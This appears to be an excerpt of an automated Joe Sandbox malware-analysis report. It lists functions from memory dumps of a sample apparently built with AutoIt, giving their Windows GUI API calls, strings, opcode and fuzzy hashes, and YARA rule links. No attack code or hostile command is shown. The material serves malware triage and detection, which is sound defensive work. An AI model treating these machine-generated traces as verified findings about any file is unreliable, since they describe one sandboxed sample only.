SelectObject.GDI32(?,?), ref: 00EAAD49
DeleteObject.GDI32(?), ref: 00EAAD4E
SetTextColor.GDI32(?,?), ref: 00EAAD54
SetBkColor.GDI32(?,?), ref: 00EAAD5E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: a069b127694aa23508a078afc29fb2dc6509bc5a1a605bfe4fd2ebfd25cacdaa
Instruction ID: 22e3b3b18d41acb2d1b5bef4835e3d39d22df3909ba5abadecf6525b4d677832
Opcode Fuzzy Hash: a069b127694aa23508a078afc29fb2dc6509bc5a1a605bfe4fd2ebfd25cacdaa
Instruction Fuzzy Hash: 57616C71901218EFDF119FA5DC48EAEBBB9EB0E320F144225F911BB2A1D771AD40DB90

Function 00EA8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EA8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA8D45
CharNextW.USER32(0000014E), ref: 00EA8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EA8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EA8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EA8DF9
SetWindowTextW.USER32(?,0000014E), ref: 00EA8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EA8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EA8E8C
_memset.LIBCMT ref: 00EA8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EA8EFA
_memset.LIBCMT ref: 00EA8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EA8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00EA8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00EA9088
InvalidateRect.USER32(?,00000000,00000001), ref: 00EA90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EA90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EA9121
DrawMenuBar.USER32(?), ref: 00EA9130
SetWindowTextW.USER32(?,0000014E), ref: 00EA9158

Strings

0, xrefs: 00EA90C2

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 5ecf0120b039b29770ceab13fb7a88a9ac398435b49f9fec530e953f89df5004
Instruction ID: 6b5ef27eb7ec75afe12fec6d5d8b400fcadbebc9bfc1f68b7b007292939e6540
Opcode Fuzzy Hash: 5ecf0120b039b29770ceab13fb7a88a9ac398435b49f9fec530e953f89df5004
Instruction Fuzzy Hash: FBE1A270901209AFDF209F61CC84EEE7BB9EF1E714F049159F915BA291DB70AA85CF60

Function 00EA4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00EA4C51
GetDesktopWindow.USER32 ref: 00EA4C66
GetWindowRect.USER32(00000000), ref: 00EA4C6D
GetWindowLongW.USER32(?,000000F0), ref: 00EA4CCF
DestroyWindow.USER32(?), ref: 00EA4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EA4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EA4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EA4D68
SendMessageW.USER32(?,00000421,?,?), ref: 00EA4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EA4D90
IsWindowVisible.USER32(?), ref: 00EA4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EA4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EA4DDF
GetWindowRect.USER32(?,?), ref: 00EA4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00EA4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00EA4E37
CopyRect.USER32(?,?), ref: 00EA4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00EA4EB9

Strings

0, xrefs: 00EA4BFC
(, xrefs: 00EA4E2A
tooltips_class32, xrefs: 00EA4D1D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: aaa431edafe1b1fb669d5d192bec3db24e460f96ab1b7b0c7258a9f26840726c
Instruction ID: 5ff65bca528bb6090b14a886ee0d568ad4a6683f0f637c57dbabacf5770afa00
Opcode Fuzzy Hash: aaa431edafe1b1fb669d5d192bec3db24e460f96ab1b7b0c7258a9f26840726c
Instruction Fuzzy Hash: C3B18DB1604350AFDB04DF65D845B6ABBE4FF8A314F00991CF599AB2A1D7B1EC04CB91

Function 00E846D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E846E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E8470E
_wcscpy.LIBCMT ref: 00E8473C
_wcscmp.LIBCMT ref: 00E84747
_wcscat.LIBCMT ref: 00E8475D
_wcsstr.LIBCMT ref: 00E84768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E84784
_wcscat.LIBCMT ref: 00E847CD
_wcscat.LIBCMT ref: 00E847D4
_wcsncpy.LIBCMT ref: 00E847FF

Strings

04090000, xrefs: 00E847BA
StringFileInfo\, xrefs: 00E84757
\VarFileInfo\Translation, xrefs: 00E8477C
DefaultLangCodepage, xrefs: 00E847E7
%u.%u.%u.%u, xrefs: 00E84862

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: c6130080ce9b7ad7a70cad7fbe49e3cb961ab9b259bc51d16de77d032b3ddd79
Instruction ID: ab5d286027d5f6dc521e49ca5f7b380c2db7b9be59ea7e230dfad1af5171dae4
Opcode Fuzzy Hash: c6130080ce9b7ad7a70cad7fbe49e3cb961ab9b259bc51d16de77d032b3ddd79
Instruction Fuzzy Hash: A041F671A003017ADB14BBB5AC46EBF77ECDF46710F44206AF908F6182EB75AA0197A5

Function 00E227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E228BC
GetSystemMetrics.USER32(00000007), ref: 00E228C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E228EF
GetSystemMetrics.USER32(00000008), ref: 00E228F7
GetSystemMetrics.USER32(00000004), ref: 00E2291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E22939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E22949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E2297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E22990
GetClientRect.USER32(00000000,000000FF), ref: 00E229AE
GetStockObject.GDI32(00000011), ref: 00E229CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E229D5

Part of subcall function 00E22344: GetCursorPos.USER32(?), ref: 00E22357
Part of subcall function 00E22344: ScreenToClient.USER32(00EE67B0,?), ref: 00E22374
Part of subcall function 00E22344: GetAsyncKeyState.USER32(00000001), ref: 00E22399
Part of subcall function 00E22344: GetAsyncKeyState.USER32(00000002), ref: 00E223A7

SetTimer.USER32(00000000,00000000,00000028,00E21256), ref: 00E229FC

Strings

AutoIt v3 GUI, xrefs: 00E22974

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: aa51c525b62ac2365123cc52b29e422d43fb431e87eeb96361af1dda0b209947
Instruction ID: da7c286c6ef2a493530a9b01cafac9dcefd1d219888b7f96b47054ead439a784
Opcode Fuzzy Hash: aa51c525b62ac2365123cc52b29e422d43fb431e87eeb96361af1dda0b209947
Instruction Fuzzy Hash: B6B1AF71A0025AEFDB18DFA9DC85BAD7BB4FB08315F109229FA15B7290DB70E844CB50

Function 00EA4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EA40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EA41B6

Strings

VIEWCHANGE, xrefs: 00EA4375
GETSUBITEMCOUNT, xrefs: 00EA4141
SELECTCLEAR, xrefs: 00EA4235
SELECT, xrefs: 00EA4250
DESELECT, xrefs: 00EA42A4
SELECTALL, xrefs: 00EA421D
GETSELECTEDCOUNT, xrefs: 00EA4199
SELECTINVERT, xrefs: 00EA4286
ISSELECTED, xrefs: 00EA41C1
FINDITEM, xrefs: 00EA4329
GETITEMCOUNT, xrefs: 00EA4128
GETSELECTED, xrefs: 00EA42E4
GETTEXT, xrefs: 00EA415F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: d9a1069d6c7a2e0c425e60db257739bd4955855e4824198b998643424f70a72e
Instruction ID: 8aedfc9741c77c6074863513ea105d2b95579d93772d3a05202fee74e34b0745
Opcode Fuzzy Hash: d9a1069d6c7a2e0c425e60db257739bd4955855e4824198b998643424f70a72e
Instruction Fuzzy Hash: B6A18EB02142119BCB14EF20D942A6AB7E5BFC9314F14696DB8967B3D2DB70FC0ACB51

Function 00E952F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00E95309
LoadCursorW.USER32(00000000,00007F8A), ref: 00E95314
LoadCursorW.USER32(00000000,00007F00), ref: 00E9531F
LoadCursorW.USER32(00000000,00007F03), ref: 00E9532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00E95335
LoadCursorW.USER32(00000000,00007F01), ref: 00E95340
LoadCursorW.USER32(00000000,00007F81), ref: 00E9534B
LoadCursorW.USER32(00000000,00007F88), ref: 00E95356
LoadCursorW.USER32(00000000,00007F80), ref: 00E95361
LoadCursorW.USER32(00000000,00007F86), ref: 00E9536C
LoadCursorW.USER32(00000000,00007F83), ref: 00E95377
LoadCursorW.USER32(00000000,00007F85), ref: 00E95382
LoadCursorW.USER32(00000000,00007F82), ref: 00E9538D
LoadCursorW.USER32(00000000,00007F84), ref: 00E95398
LoadCursorW.USER32(00000000,00007F04), ref: 00E953A3
LoadCursorW.USER32(00000000,00007F02), ref: 00E953AE
GetCursorInfo.USER32(?), ref: 00E953BE
GetLastError.KERNEL32(00000001,00000000), ref: 00E953E9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 35743d2751c7996f7032e6c9d8115a358c6015ab2e974a334ed8a0548106cb8f
Instruction ID: 5f0ecf2fa61509b7d1820636da8a95f4681fbeaedf39d013d23627b5ef6b84e5
Opcode Fuzzy Hash: 35743d2751c7996f7032e6c9d8115a358c6015ab2e974a334ed8a0548106cb8f
Instruction Fuzzy Hash: 86416070E043196ADF109FBA8C4986EFFF8EF55B10B10452BE519E7291DAB8A4008F61

Function 00E7AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00E7AAA5
__swprintf.LIBCMT ref: 00E7AB46
_wcscmp.LIBCMT ref: 00E7AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E7ABAE
_wcscmp.LIBCMT ref: 00E7ABEA
GetClassNameW.USER32(?,?,00000400), ref: 00E7AC21
GetDlgCtrlID.USER32(?), ref: 00E7AC73
GetWindowRect.USER32(?,?), ref: 00E7ACA9
GetParent.USER32(?), ref: 00E7ACC7
ScreenToClient.USER32(00000000), ref: 00E7ACCE
GetClassNameW.USER32(?,?,00000100), ref: 00E7AD48
_wcscmp.LIBCMT ref: 00E7AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00E7AD82
_wcscmp.LIBCMT ref: 00E7AD96

Part of subcall function 00E4386C: _iswctype.LIBCMT ref: 00E43874

Strings

%s%u, xrefs: 00E7AB40

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 33a0cfc57b69cc3fae976d25cd762b6ab90b4b92ea33143ca1f76cf99988558b
Instruction ID: 64dc76b70ff57b272c9bd1e0166e2270d3765976bc74d407d6a0ea20e50c9cf0
Opcode Fuzzy Hash: 33a0cfc57b69cc3fae976d25cd762b6ab90b4b92ea33143ca1f76cf99988558b
Instruction Fuzzy Hash: 81A1B271204206AFD729DF60C884BAEF7E8FF84319F189539FA9DA2550D730E945CB92

Function 00E7B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00E7B3DB
_wcscmp.LIBCMT ref: 00E7B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00E7B414
CharUpperBuffW.USER32(?,00000000), ref: 00E7B431
_wcscmp.LIBCMT ref: 00E7B44F
_wcsstr.LIBCMT ref: 00E7B460
GetClassNameW.USER32(00000018,?,00000400), ref: 00E7B498
_wcscmp.LIBCMT ref: 00E7B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00E7B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00E7B518
_wcscmp.LIBCMT ref: 00E7B528
GetClassNameW.USER32(00000010,?,00000400), ref: 00E7B550
GetWindowRect.USER32(00000004,?), ref: 00E7B5B9

Strings

@, xrefs: 00E7B3BC
ThumbnailClass, xrefs: 00E7B4A3, 00E7B523

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 51429ab27c738249398467fa80ca526486200b5ada211d4e2502915d92f7dd4f
Instruction ID: 654ce72abc32b355ed0a932270e51bf25ceedb20c523eff07ddafa98184f1496
Opcode Fuzzy Hash: 51429ab27c738249398467fa80ca526486200b5ada211d4e2502915d92f7dd4f
Instruction Fuzzy Hash: 7481A0710083059FDB14DF50D885FAA7BE8EF44318F04E56AFD99AA092EB34DD49CBA1

Function 00EAC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

DragQueryPoint.SHELL32(?,?), ref: 00EAC917

Part of subcall function 00EAADF1: ClientToScreen.USER32(?,?), ref: 00EAAE1A
Part of subcall function 00EAADF1: GetWindowRect.USER32(?,?), ref: 00EAAE90
Part of subcall function 00EAADF1: PtInRect.USER32(?,?,00EAC304), ref: 00EAAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00EAC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EAC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EAC9AE
_wcscat.LIBCMT ref: 00EAC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EAC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00EACA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00EACA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00EACA47
DragFinish.SHELL32(?), ref: 00EACA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EACB41

Strings

@GUI_DRAGID, xrefs: 00EACAB9
pr, xrefs: 00EACA8B
@GUI_DROPID, xrefs: 00EACA6E
@GUI_DRAGFILE, xrefs: 00EACAF0

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
API String ID: 169749273-2073472848
Opcode ID: 328eb22500a119d8339167564c5efcfbf6c1054b79023afef4c9be470dd33e08
Instruction ID: 2309bad8e7bee08476288ce522153242352b4aeba5a89eeeeb6489bfa646a965
Opcode Fuzzy Hash: 328eb22500a119d8339167564c5efcfbf6c1054b79023afef4c9be470dd33e08
Instruction Fuzzy Hash: 77617C71108310AFC711DF61DC85D9FBBE8EFC9710F04192EF595A62A1DB70AA49CB92

Function 00E7B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E7B23F

Strings

[HANDLE:, xrefs: 00E7B24B
[ALL, xrefs: 00E7B2E5
[ACTIVE, xrefs: 00E7B22C
HANDLE=, xrefs: 00E7B238
ALL, xrefs: 00E7B2D3
CLASSNAME=, xrefs: 00E7B27C
[LAST, xrefs: 00E7B2EC
LAST, xrefs: 00E7B204
[REGEXPTITLE:, xrefs: 00E7B267
REGEXP=, xrefs: 00E7B254
ACTIVE, xrefs: 00E7B21A
[CLASS:, xrefs: 00E7B28F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 901003002fef80b8389aae2375d57ad8495cf11994b9e8b5b0f6b03cfe5b2b2b
Instruction ID: 5cf687cfcbba45ab21483f096aea2cfd75a2f022ed1c64ee4705525149b1bbad
Opcode Fuzzy Hash: 901003002fef80b8389aae2375d57ad8495cf11994b9e8b5b0f6b03cfe5b2b2b
Instruction Fuzzy Hash: 0631DC31A45355A6DB10FA60ED43FEEB7E4DF20750F20602AB459B21E3EF61AE05C651

Function 00E7C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00E7C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E7C4E6
SetWindowTextW.USER32(?,?), ref: 00E7C4FD
GetDlgItem.USER32(?,000003EA), ref: 00E7C512
SetWindowTextW.USER32(00000000,?), ref: 00E7C518
GetDlgItem.USER32(?,000003E9), ref: 00E7C528
SetWindowTextW.USER32(00000000,?), ref: 00E7C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E7C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E7C569
GetWindowRect.USER32(?,?), ref: 00E7C572
SetWindowTextW.USER32(?,?), ref: 00E7C5DD
GetDesktopWindow.USER32 ref: 00E7C5E3
GetWindowRect.USER32(00000000), ref: 00E7C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E7C636
GetClientRect.USER32(?,?), ref: 00E7C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E7C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E7C693

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 26efc1d9be09c4879e1a3fcb81592546717161baaf1d8f4f0bb26f03b47a1ebe
Instruction ID: fa89fa347486de8f3a6c1bb633ca6c36d18dab542a5a4f63b5410ebe739a8f80
Opcode Fuzzy Hash: 26efc1d9be09c4879e1a3fcb81592546717161baaf1d8f4f0bb26f03b47a1ebe
Instruction Fuzzy Hash: 20517C70900709AFDB209FA9DD85B6EBBF9FF48709F10492CE686B25A0D775B944CB40

Function 00EAA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EAA4C8
DestroyWindow.USER32(?,?), ref: 00EAA542
